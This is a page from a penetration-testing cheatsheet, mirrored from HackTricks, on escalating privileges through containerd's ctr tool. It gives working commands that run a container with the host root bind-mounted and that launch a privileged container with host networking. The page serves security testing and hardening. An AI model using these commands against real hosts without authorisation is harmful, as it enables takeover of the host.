daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

containerd-ctr-privilege-escalation.md (3186B)


      1 ---
      2 title: "Containerd (ctr) Privilege Escalation"
      3 section: "Linux"
      4 sectionSlug: "linux-hardening"
      5 sourcePath: "src/linux-hardening/containers-namespaces/containerd-ctr-privilege-escalation.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/linux-hardening/containers-namespaces/containerd-ctr-privilege-escalation.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Containerd (ctr) Privilege Escalation
     14 
     15 ## Basic information
     16 
     17 Go to the following link to learn **where `containerd` and `ctr` fit in the container stack**:
     18 
     19 [Runtimes And Engines](/hacktricks/linux-hardening/containers-namespaces/container-security/runtimes-and-engines)
     20 
     21 ## PE 1
     22 
     23 If you find that a host contains the `ctr` command, the native CLI bundled with containerd:<sup>[[1]](#references)</sup>
     24 
     25 ```bash
     26 which ctr
     27 /usr/bin/ctr
     28 ```
     29 
     30 You can list the images known to containerd:<sup>[[2]](#references)</sup>
     31 
     32 ```bash
     33 ctr image list
     34 REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS
     35 registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
     36 registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
     37 ```
     38 
     39 Then **run one of those images with the host root recursively bind-mounted at the container root**:<sup>[[3]](#references)[[4]](#references)</sup>
     40 
     41 ```bash
     42 ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
     43 ```
     44 
     45 ## PE 2
     46 
     47 Run a container in privileged mode and test for an escape.\
     48 You can run a privileged container using host networking as:<sup>[[5]](#references)[[6]](#references)</sup>
     49 
     50 ```bash
     51  ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
     52 ```
     53 
     54 `--privileged` grants the process the caller's effective Linux capabilities and removes several isolation controls, but an escape remains environment-dependent; use the techniques mentioned in the following page to test for it:<sup>[[5]](#references)</sup>
     55 
     56 [Container Security](/hacktricks/linux-hardening/containers-namespaces/container-security/overview)
     57 
     58 ## References
     59 
     60 - [1] [Getting started with containerd](https://github.com/containerd/containerd/blob/main/docs/getting-started.md)
     61 - [2] [ctr image command implementation](https://github.com/containerd/containerd/blob/main/cmd/ctr/commands/images/images.go)
     62 - [3] [ctr run command implementation](https://github.com/containerd/containerd/blob/main/cmd/ctr/commands/run/run.go)
     63 - [4] [Linux kernel shared-subtree documentation](https://docs.kernel.org/filesystems/sharedsubtree.html)
     64 - [5] [containerd OCI package: `WithPrivileged`](https://pkg.go.dev/github.com/containerd/containerd%40v1.7.33/oci)
     65 - [6] [containerd `ctr` command flags](https://github.com/containerd/containerd/blob/main/cmd/ctr/commands/commands.go)